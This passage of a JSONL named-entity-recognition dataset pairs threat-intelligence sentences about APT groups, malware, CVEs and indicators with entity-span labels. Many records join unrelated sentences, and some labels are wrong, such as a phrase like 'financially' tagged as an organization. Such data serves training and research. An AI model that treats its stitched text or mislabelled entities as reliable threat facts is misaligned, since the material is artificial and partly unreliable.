The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies .", "spans": {"SYSTEM: Kaspersky Internet Security": [[0, 27]], "SYSTEM: Android": [[32, 39]], "SYSTEM: Sberbank Online app": [[48, 67]], "MALWARE: CONFUCIUS_B": [[128, 139]], "TOOL: RTLO": [[228, 232]], "THREAT_ACTOR: Leviathan group": [[264, 279]], "ORGANIZATION: engineering": [[306, 317]], "ORGANIZATION: transportation": [[320, 334]], "ORGANIZATION: defense industry": [[345, 361]]}, "info": {"id": "cyberner_stix_train_005650", "source": "cyberner_stix_train"}} {"text": "Due to the sheer number of recipients , it may not have been possible to customize the emails in the same way as was possible with lower-volume campaigns .", "spans": {"TOOL: emails": [[87, 93]]}, "info": {"id": "cyberner_stix_train_005651", "source": "cyberner_stix_train"}} {"text": "As mentioned earlier , we believe that OSX_DOK.C might be the MAC OS X version of WERDLOD , an online banking malware that used the same techniques as Operation Emmental .", "spans": {"MALWARE: OSX_DOK.C": [[39, 48]], "SYSTEM: MAC": [[62, 65]], "MALWARE: WERDLOD": [[82, 89]], "MALWARE: malware": [[110, 117]], "TOOL: Operation Emmental": [[151, 169]]}, "info": {"id": "cyberner_stix_train_005652", "source": "cyberner_stix_train"}} {"text": "Hackers can hide their apps ’ real intentions or even manipulate users into leaving positive ratings , in some cases unknowingly . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation . The MainConnectionIo function checks if the Windows Firewall is enabled , sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function . 
• Other actors merged into this group : 0 Sign up for free Mandiant Threat Intelligence for detailed reports about UNC groups including :", "spans": {"ORGANIZATION: Dragos": [[131, 137]], "SYSTEM: Windows": [[329, 336]], "TOOL: Firewall": [[337, 345]], "TOOL: Tcp Keep Alive": [[368, 382]]}, "info": {"id": "cyberner_stix_train_005653", "source": "cyberner_stix_train"}} {"text": "APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . We have reported the issues to the UPX team , and they have already fixed it .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "TOOL: public and non-public tools": [[25, 52]], "TOOL: ALFA TEaM Shell": [[138, 153]], "TOOL: publicly available web shell": [[160, 188]], "TOOL: UPX": [[226, 229]]}, "info": {"id": "cyberner_stix_train_005654", "source": "cyberner_stix_train"}} {"text": "FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . 
The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actors": [[26, 32]], "ORGANIZATION: financially": [[56, 67]], "VULNERABILITY: CVE-2017-0261": [[120, 133]], "THREAT_ACTOR: APT28": [[140, 145]], "VULNERABILITY: CVE-2017-0262": [[180, 193]], "VULNERABILITY: CVE-2017-0263": [[250, 263]], "ORGANIZATION: Microsoft": [[298, 307]], "THREAT_ACTOR: groups": [[373, 379]], "THREAT_ACTOR: STRONTIUM": [[393, 402]], "THREAT_ACTOR: PLATINUM": [[407, 415]], "ORGANIZATION: specific individuals": [[513, 533]], "ORGANIZATION: institutions": [[538, 550]], "ORGANIZATION: military": [[569, 577]], "ORGANIZATION: intelligence agencies": [[594, 615]], "ORGANIZATION: government": [[628, 638]]}, "info": {"id": "cyberner_stix_train_005655", "source": "cyberner_stix_train"}} {"text": "While WERDLOD and OSX_DOK.C use different codes ( since they target different operating systems ) , they have similar proxy settings and script formats .", "spans": {"MALWARE: WERDLOD": [[6, 13]], "MALWARE: OSX_DOK.C": [[18, 27]]}, "info": {"id": "cyberner_stix_train_005656", "source": "cyberner_stix_train"}} {"text": "We have chosen to join forces to continue the investigation around Gooligan . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations . referred to as maturity levels . 
The threat actor then used the built - in certutil utility to Base64 encode the segments .", "spans": {"MALWARE: Gooligan": [[67, 75]], "THREAT_ACTOR: operators": [[191, 200]], "THREAT_ACTOR: APT38": [[209, 214]], "TOOL: built - in certutil utility": [[387, 414]]}, "info": {"id": "cyberner_stix_train_005657", "source": "cyberner_stix_train"}} {"text": "] netsybil-parks [ . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran . For example , “ hugesoft.org ” is an FQDN but also represents a zone . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: civil society": [[162, 175]], "DOMAIN: hugesoft.org": [[289, 301]], "TOOL: FQDN": [[310, 314]]}, "info": {"id": "cyberner_stix_train_005658", "source": "cyberner_stix_train"}} {"text": "APT28 : AT THE CENTER OF THE STORM .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_005659", "source": "cyberner_stix_train"}} {"text": "In fact , they were extremely open and verbose about their functionality - for example , early samples contained a plethora of logging messages in unencrypted form .", "spans": {}, "info": {"id": "cyberner_stix_train_005660", "source": "cyberner_stix_train"}} {"text": "WildFire properly classifies these Downeks and Quasar samples as malicious .", "spans": {"TOOL: WildFire": [[0, 8]], "MALWARE: Downeks": [[35, 42]], "MALWARE: Quasar": [[47, 53]]}, "info": {"id": "cyberner_stix_train_005662", "source": "cyberner_stix_train"}} {"text": "The com.dsufabunfzs.dowiflubs strings in the screenshot above refer to the internal name this particular malware was given , which in this case was randomized into alphabet salad . 
APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists . ANEL ( also referred to as UpperCut ) an internal user may have fallen prey to a spear phishing attack ,", "spans": {"THREAT_ACTOR: APT38": [[181, 186]], "THREAT_ACTOR: regime-backed group": [[227, 246]], "ORGANIZATION: financial institutions": [[302, 324]], "THREAT_ACTOR: cyber heists": [[367, 379]], "MALWARE: ANEL": [[382, 386]], "MALWARE: UpperCut": [[409, 417]], "ORGANIZATION: an internal user": [[420, 436]]}, "info": {"id": "cyberner_stix_train_005663", "source": "cyberner_stix_train"}} {"text": "This campaign is named after a rare backdoor used by the MoleRATs Group , dubbed Spark by Cybereason and previously reported by 360 ’s blog .", "spans": {"THREAT_ACTOR: MoleRATs": [[57, 65]], "MALWARE: Spark": [[81, 86]], "ORGANIZATION: Cybereason": [[90, 100]], "ORGANIZATION: 360": [[128, 131]]}, "info": {"id": "cyberner_stix_train_005665", "source": "cyberner_stix_train"}} {"text": "The activity class “ org.starsizew.MainActivity ” executes when the app is started . In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" . Finally the macros are executed using the Office engine . 
If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload • None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": {"ORGANIZATION: Symantec": [[104, 112]], "THREAT_ACTOR: attack groups": [[153, 166]], "THREAT_ACTOR: Cadelle": [[197, 204]], "THREAT_ACTOR: Chafer": [[209, 215]], "TOOL: Backdoor.Cadelspy": [[241, 258]], "TOOL: Backdoor.Remexi": [[263, 278]], "TOOL: macros": [[358, 364]], "TOOL: Office": [[388, 393]]}, "info": {"id": "cyberner_stix_train_005666", "source": "cyberner_stix_train"}} {"text": "Broadcast Receivers are Android components that can register themselves for particular events . In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" .", "spans": {"SYSTEM: Android": [[24, 31]], "THREAT_ACTOR: Silence": [[125, 132]], "ORGANIZATION: banks": [[142, 147]], "THREAT_ACTOR: Turk Black Hat": [[276, 290]]}, "info": {"id": "cyberner_stix_train_005667", "source": "cyberner_stix_train"}} {"text": "It is interesting that the attackers used Java Base64 library developed by Sauron Software . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . 
NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package .", "spans": {"ORGANIZATION: Sauron Software": [[75, 90]], "VULNERABILITY: Microsoft Office vulnerability": [[141, 171]], "VULNERABILITY: CVE-2017-11882": [[174, 188]], "THREAT_ACTOR: NEODYMIUM": [[193, 202]], "SYSTEM: Windows": [[231, 238]], "MALWARE: Wingbird": [[251, 259]], "ORGANIZATION: FinFisher": [[298, 307]]}, "info": {"id": "cyberner_stix_train_005668", "source": "cyberner_stix_train"}} {"text": "XLoader can also start other attacker-specified packages . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown . It contains information like : Server address and port the client will connect to ; The password chosen by the attacker for the remote access ; The ID associated to the victim client .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: groups'": [[152, 159]], "ORGANIZATION: Chinese universities": [[172, 192]]}, "info": {"id": "cyberner_stix_train_005669", "source": "cyberner_stix_train"}} {"text": "At the time of writing Lookout has observed two updates to the Dardesh application , the first on February 26 and the second on March 28 . However , from this it 's only clear that Lazarus might have attacked Polish banks . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . 
None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"ORGANIZATION: Lookout": [[23, 30]], "MALWARE: Dardesh": [[63, 70]], "THREAT_ACTOR: Lazarus": [[181, 188]], "ORGANIZATION: banks": [[216, 221]], "THREAT_ACTOR: Elfin": [[228, 233]], "THREAT_ACTOR: APT33": [[256, 261]], "ORGANIZATION: CrowdStrike Services": [[464, 484]], "THREAT_ACTOR: Play ransomware intrusions": [[513, 539]], "TOOL: Microsoft Exchange": [[590, 608]]}, "info": {"id": "cyberner_stix_train_005670", "source": "cyberner_stix_train"}} {"text": "Other research have also connected the OSX malware and Retefe ( the external term used for WERDLOD ) via similarities in their behavior .", "spans": {"SYSTEM: OSX": [[39, 42]], "MALWARE: WERDLOD": [[91, 98]]}, "info": {"id": "cyberner_stix_train_005671", "source": "cyberner_stix_train"}} {"text": "FANCY BEAR has also been linked publicly to intrusions into the German Bundestag and France ’s TV5 Monde TV station in April 2015 .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[0, 10]], "ORGANIZATION: Bundestag": [[71, 80]], "ORGANIZATION: TV5 Monde": [[95, 104]]}, "info": {"id": "cyberner_stix_train_005672", "source": "cyberner_stix_train"}} {"text": "Actors will run HTRAN on a server and configure their malware to interact with that server ; however , the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"THREAT_ACTOR: Actors": [[0, 6]], "TOOL: HTRAN": [[16, 21], [128, 133]], "THREAT_ACTOR: actor": [[107, 112]], "MALWARE: PIVY": [[207, 211], [473, 477]], "ORGANIZATION: chemical makers": [[285, 300]], "ORGANIZATION: government agencies": [[303, 322]], "ORGANIZATION: defense contractors": [[325, 344]], "THREAT_ACTOR: attackers": [[415, 424]], "VULNERABILITY: zero-day": [[432, 440]]}, "info": {"id": "cyberner_stix_train_005673", "source": "cyberner_stix_train"}} {"text": "Xiaomi , a privately owned Chinese electronics and software company , is the 5th largest smart phone manufacturer in the world and also manufactures IoT devices for the home . APT41 has also used credentials compromised in previous operations . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others .", "spans": {"ORGANIZATION: Xiaomi": [[0, 6]], "THREAT_ACTOR: APT41": [[176, 181]], "THREAT_ACTOR: Sofacy group": [[259, 271]], "MALWARE: CORESHELL": [[342, 351]], "MALWARE: SPLM": [[354, 358]], "MALWARE: JHUHUGIT": [[361, 369]], "MALWARE: AZZY": [[372, 376]]}, "info": {"id": "cyberner_stix_train_005674", "source": "cyberner_stix_train"}} {"text": "Germany is one of the first attack turfs TrickBot spread to when it first emerged in 2016 . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . 
All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East .", "spans": {"MALWARE: TrickBot": [[41, 49]], "VULNERABILITY: CVE-2017-1182": [[179, 192]], "MALWARE: Microsoft Equation Editor": [[210, 235]], "MALWARE: EQNEDT32.exe": [[238, 250]], "ORGANIZATION: government agency": [[391, 408]]}, "info": {"id": "cyberner_stix_train_005675", "source": "cyberner_stix_train"}} {"text": "] it/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets .", "spans": {"MALWARE: BalkanRAT": [[52, 61]], "MALWARE: BalkanDoor": [[172, 182]]}, "info": {"id": "cyberner_stix_train_005676", "source": "cyberner_stix_train"}} {"text": "At this stage , we have two similar , parallel constructions of events – the how behind the immediate deployment and execution of TRITON / TRISIS – yet dramatically different responses in terms of attribution and labeling .", "spans": {"MALWARE: TRITON": [[130, 136]], "MALWARE: TRISIS": [[139, 145]]}, "info": {"id": "cyberner_stix_train_005677", "source": "cyberner_stix_train"}} {"text": "After that , stage 2 payloads are still retrieved as Bitmap ( BMP ) images that use Least Significant Bit ( LSB ) Steganography to hide the real payloads .", "spans": {"TOOL: Bitmap": [[53, 59]], "TOOL: BMP": [[62, 65]], "TOOL: images": [[68, 74]], "TOOL: Least Significant Bit": [[84, 105]], "TOOL: LSB": [[108, 111]], "TOOL: Steganography": [[114, 127]]}, "info": {"id": "cyberner_stix_train_005678", "source": 
"cyberner_stix_train"}} {"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . The malware configuration contains one Command and Control: pactchfilepacks.net23.net .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: Android/AdDisplay.Ashas": [[45, 68]], "ORGANIZATION: Kaspersky": [[84, 93]], "THREAT_ACTOR: PROJECTM": [[157, 165]], "THREAT_ACTOR: MYTHIC LEOPARD": [[170, 184]], "ORGANIZATION: military": [[283, 291]], "DOMAIN: pactchfilepacks.net23.net": [[362, 387]]}, "info": {"id": "cyberner_stix_train_005679", "source": "cyberner_stix_train"}} {"text": "It is impossible to deprive it of these rights without the use of specialized tools ( such as Kaspersky Internet Security for Android ) . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim . Local user account creation tools . /Library / Ruby / Gems/2.6.0 / extensions / init.rb Ruby script 53789519 /usr / local / bin / com.docker.vmnat FULLHOUSE.DOORED 53789522 /usr / local / bin / com.docker.vmnat.lock Not recovered 54101444 /Library / Fonts / ArialUnicode.ttf.md5 STRATOFEAR ( Config ) 54102142", "spans": {"SYSTEM: Kaspersky Internet Security": [[94, 121]], "SYSTEM: Android": [[126, 133]], "TOOL: Epic backdoor": [[215, 228]], "TOOL: Local user account creation tools": [[290, 323]]}, "info": {"id": "cyberner_stix_train_005680", "source": "cyberner_stix_train"}} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . 
The malware will begin to download other utilities .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "TOOL: utilities": [[240, 249]]}, "info": {"id": "cyberner_stix_train_005681", "source": "cyberner_stix_train"}} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco .", "spans": {"THREAT_ACTOR: Patchwork": [[10, 19]], "MALWARE: MS PowerPoint document": [[28, 50]], "VULNERABILITY: CVE-2014-6352": [[76, 89]], "MALWARE: KeyBoy": [[156, 162]], "ORGANIZATION: Cisco": [[186, 191]]}, "info": {"id": "cyberner_stix_train_005682", "source": "cyberner_stix_train"}} {"text": "In this case , explorer.exe will instance the MMDeviceEnumerator class and will execute the payload .", "spans": {"FILEPATH: explorer.exe": [[15, 27]]}, "info": {"id": "cyberner_stix_train_005683", "source": "cyberner_stix_train"}} {"text": "Logcat logs show FakeSpy uses libmsy.so to execute the malicious packed mycode.jar file . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Several additional documents surfaced between January 17 and February 3 .", "spans": {"MALWARE: FakeSpy": [[17, 24]], "THREAT_ACTOR: actors": [[111, 117]], "TOOL: HyperBro": [[153, 161]], "THREAT_ACTOR: Emissary Panda": [[196, 210]]}, "info": {"id": "cyberner_stix_train_005684", "source": "cyberner_stix_train"}} {"text": "] ponethus [ . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . And a new version of Ixeshe , which has been in service since 2009 to attack targets in East Asia , uses new network traffic patterns , possibly to evade traditional network security systems . 
We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"MALWARE: document malware": [[41, 57]], "ORGANIZATION: Tibetan non-governmental organizations": [[77, 115]], "ORGANIZATION: Falun Gong": [[144, 154]], "ORGANIZATION: Uyghur groups": [[159, 172]], "MALWARE: Ixeshe": [[196, 202]]}, "info": {"id": "cyberner_stix_train_005685", "source": "cyberner_stix_train"}} {"text": "Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . 
While there is some overlap between IP addresses used by Scarlet Mimic E-APT and Putter Panda , it has not been concluded that the groups are the same .", "spans": {"TOOL: Bemstour": [[442, 450]], "TOOL: DoublePulsar backdoor": [[476, 497]], "THREAT_ACTOR: Scarlet Mimic": [[557, 570]], "THREAT_ACTOR: Putter Panda": [[581, 593]]}, "info": {"id": "cyberner_stix_train_005686", "source": "cyberner_stix_train"}} {"text": "In this case , we had observed a strange pattern emerging from the Sofacy group over the past year within their command and control infrastructure .", "spans": {"THREAT_ACTOR: Sofacy": [[67, 73]], "TOOL: command and control": [[112, 131]]}, "info": {"id": "cyberner_stix_train_005687", "source": "cyberner_stix_train"}} {"text": "Saudi Arabia released a warning to local organizations about the Shamoon malware , alerting about potential attacks and advising organizations to prepare .", "spans": {"MALWARE: Shamoon": [[65, 72]]}, "info": {"id": "cyberner_stix_train_005688", "source": "cyberner_stix_train"}} {"text": "The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 . Brief Description : SFX Archive Second Stage . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"THREAT_ACTOR: actors": [[204, 210]], "ORGANIZATION: Unit 42": [[267, 274]], "TOOL: SFX Archive": [[331, 342]], "THREAT_ACTOR: Monti": [[392, 397]], "SYSTEM: Linux platform": [[413, 427]]}, "info": {"id": "cyberner_stix_train_005689", "source": "cyberner_stix_train"}} {"text": "As an initial attack vector , “ Agent Smith ” abuses the 9Apps market – with over 360 different dropper variants . 
The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted . Dexphot exhibits multiple layers of polymorphism across the binaries it distributes . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer ’s environment .", "spans": {"MALWARE: Agent Smith": [[32, 43]], "SYSTEM: 9Apps": [[57, 62]], "ORGANIZATION: Arab Emirates": [[201, 214]], "MALWARE: Dexphot": [[335, 342]], "ORGANIZATION: Mandiant Managed Defense": [[449, 473]]}, "info": {"id": "cyberner_stix_train_005690", "source": "cyberner_stix_train"}} {"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . 
mcvsocfg.dll : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": {"MALWARE: FinFisher": [[264, 273]], "THREAT_ACTOR: APT32": [[325, 330]], "MALWARE: Microsoft ActiveMime file": [[372, 397]], "FILEPATH: mcvsocfg.dll": [[625, 637]], "ORGANIZATION: Talos": [[651, 656]], "THREAT_ACTOR: RA Group": [[693, 701]], "MALWARE: Babuk source code": [[787, 804]]}, "info": {"id": "cyberner_stix_train_005691", "source": "cyberner_stix_train"}} {"text": "Trojan.Sofacy Backdoor.SofacyX Infostealer.Sofacy OSX.Sofacy Trojan.Shunnael Trojan.Lojax .", "spans": {"MALWARE: Trojan.Sofacy": [[0, 13]], "MALWARE: Backdoor.SofacyX": [[14, 30]], "MALWARE: Infostealer.Sofacy": [[31, 49]], "MALWARE: OSX.Sofacy": [[50, 60]], "MALWARE: Trojan.Shunnael": [[61, 76]], "MALWARE: Trojan.Lojax": [[77, 89]]}, "info": {"id": "cyberner_stix_train_005692", "source": "cyberner_stix_train"}} {"text": "Detailed Malware Structure Malware Structure com.mile.brain ( SHA256 : 135d6acff3ca27e6e7997429e5f8051f88215d12351e4103f8344cd66611e0f3 ) : This is the main application found on Google Play . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . 
PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparalleled campaign which we refer to as Operation Cloud Hopper .", "spans": {"SYSTEM: Google Play": [[178, 189]], "VULNERABILITY: Heartbleed vulnerability": [[223, 247]], "ORGANIZATION: PwC UK": [[293, 299]], "ORGANIZATION: BAE Systems": [[304, 315]], "ORGANIZATION: industry": [[339, 347]], "ORGANIZATION: government": [[352, 362]]}, "info": {"id": "cyberner_stix_train_005693", "source": "cyberner_stix_train"}} {"text": "Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_005694", "source": "cyberner_stix_train"}} {"text": "The indictment was for conducting \" active cyber operations with the intent of interfering in the 2016 presidential election . \" The espionage operation was run by Unit 26165 , commanded by GRU Officer Viktor Borisovich Netykshko .", "spans": {"THREAT_ACTOR: Unit 26165": [[164, 174]], "ORGANIZATION: GRU": [[190, 193]]}, "info": {"id": "cyberner_stix_train_005695", "source": "cyberner_stix_train"}} {"text": "] 251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49 [ . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . The downloaded payload is an image file , but it contains an appended malicious payload to be decrypted .", "spans": {"MALWARE: sample": [[94, 100]]}, "info": {"id": "cyberner_stix_train_005696", "source": "cyberner_stix_train"}} {"text": "A remarkable fact is that all the targeted apps relate to Spanish banks , including targets never seen before in any other Android banking Trojan . 
On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Symantec was first to publicly report on Tick , followed by LAC in 2016 .", "spans": {"SYSTEM: Android": [[123, 130]], "THREAT_ACTOR: APT10": [[209, 214]], "ORGANIZATION: Symantec": [[375, 383]], "THREAT_ACTOR: Tick": [[416, 420]], "ORGANIZATION: LAC": [[435, 438]]}, "info": {"id": "cyberner_stix_train_005697", "source": "cyberner_stix_train"}} {"text": "Even the C & C server side was mostly exposed with the file listing available for everyone to traverse through it . In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 . The image below highlights the nodes associated with the samples analyzed in this report . The group , which has some loose ties and similarities to other Iranian APTs like APT34 and Charming Kitten , first came to light in 2019 .", "spans": {"ORGANIZATION: media": [[150, 155]], "ORGANIZATION: FireEye": [[196, 203]], "THREAT_ACTOR: APT32": [[229, 234]], "THREAT_ACTOR: group": [[332, 337]], "THREAT_ACTOR: Iranian APTs": [[392, 404]], "THREAT_ACTOR: APT34": [[410, 415]], "THREAT_ACTOR: Charming Kitten": [[420, 435]]}, "info": {"id": "cyberner_stix_train_005698", "source": "cyberner_stix_train"}} {"text": "The ShadowBrokers' latest dump of Equation Group hacks focuses on UNIX systems and GSM networks , and was accompanied by an open letter to President Trump . 
Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"ORGANIZATION: Unit 42": [[157, 164]], "ORGANIZATION: Foreign Ministry": [[241, 257]]}, "info": {"id": "cyberner_stix_train_005699", "source": "cyberner_stix_train"}} {"text": "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "FILEPATH: the decoy PDF": [[232, 245]], "ORGANIZATION: Coast Guard": [[290, 301]]}, "info": {"id": "cyberner_stix_train_005700", "source": "cyberner_stix_train"}} {"text": "EventBot uses this function to update its C2s , the configuration of webinjects , etc . Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: Honeycomb": [[88, 97]], "THREAT_ACTOR: APT33": [[338, 343]], "TOOL: emails": [[364, 370]], "ORGANIZATION: aviation industry": [[389, 406]]}, "info": {"id": "cyberner_stix_train_005701", "source": "cyberner_stix_train"}} {"text": ", IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database . 
The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government . the CFG ( specifically mblock_t : :p redset and mblock_t : :s uccset ) An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 ( update 1 ) , as exploited in the wild starting in December 2021 .", "spans": {"THREAT_ACTOR: threat group": [[455, 467]], "ORGANIZATION: government": [[598, 608]], "TOOL: mblock_t : :p redset": [[634, 654]], "TOOL: mblock_t : :s uccset": [[659, 679]], "VULNERABILITY: issue was discovered in the Calendar feature": [[685, 729]], "TOOL: Zimbra Collaboration Suite 8.8.x": [[733, 765]]}, "info": {"id": "cyberner_stix_train_005702", "source": "cyberner_stix_train"}} {"text": "This could be very dangerous and cause some devices to crash following the overwrite . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . While paying for your reservation or checking out at a hotel , it ’s a good idea to use a virtual wallet such as Apple Pay , Google Pay , etc . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": {"ORGANIZATION: government agencies": [[192, 211]], "ORGANIZATION: Fatah political party": [[220, 241]], "TOOL: Apple Pay": [[357, 366]], "TOOL: Google Pay": [[369, 379]], "THREAT_ACTOR: extremely effective social engineering techniques": [[435, 484]]}, "info": {"id": "cyberner_stix_train_005703", "source": "cyberner_stix_train"}} {"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . 
this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"MALWARE: RTF": [[5, 8]], "VULNERABILITY: CVE-2017_1882": [[28, 41]], "MALWARE: eqnedt32.exe": [[45, 57]], "TOOL: RTF": [[65, 68]], "VULNERABILITY: CVE-2017-1882": [[88, 101]], "FILEPATH: eqnedt32.exe": [[105, 117]]}, "info": {"id": "cyberner_stix_train_005704", "source": "cyberner_stix_train"}} {"text": "Step 3 : Run installation Start the Bank Austria security app from the notifications or your download folder , tap Install . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . The group has targeted victims primarily in South Korea , but also in Japan , Vietnam , Russia , Nepal , China , India , Romania , Kuwait , and other parts of the Middle East .", "spans": {"SYSTEM: Bank Austria security app": [[36, 61]], "THREAT_ACTOR: they": [[164, 168]], "TOOL: actor-controlled": [[235, 251]], "TOOL: servers": [[252, 259]]}, "info": {"id": "cyberner_stix_train_005705", "source": "cyberner_stix_train"}} {"text": "After the Anubis actor was allegedly arrested and the source code was leaked there was also huge increase in the number of Anubis samples found in 